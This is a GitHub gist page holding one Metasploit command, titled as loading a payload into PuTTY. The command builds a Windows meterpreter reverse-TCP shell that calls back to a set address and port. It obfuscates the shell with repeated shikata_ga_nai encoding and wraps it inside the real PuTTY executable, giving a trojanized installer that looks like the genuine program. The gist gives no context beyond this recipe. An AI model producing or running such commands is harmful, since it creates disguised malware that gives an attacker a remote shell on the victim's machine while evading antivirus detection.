Skip to content

Instantly share code, notes, and snippets.

@JCotton1123
Created October 23, 2014 22:28
Show Gist options
  • Save JCotton1123/8241a2c5800951084345 to your computer and use it in GitHub Desktop.
Save JCotton1123/8241a2c5800951084345 to your computer and use it in GitHub Desktop.
Load a metasploit payload into putty
./msfpayload windows/meterpreter/reverse_tcp LHOST=169.254.141.18 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /tmp/putty.exe -o /tmp/puttyx.exe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment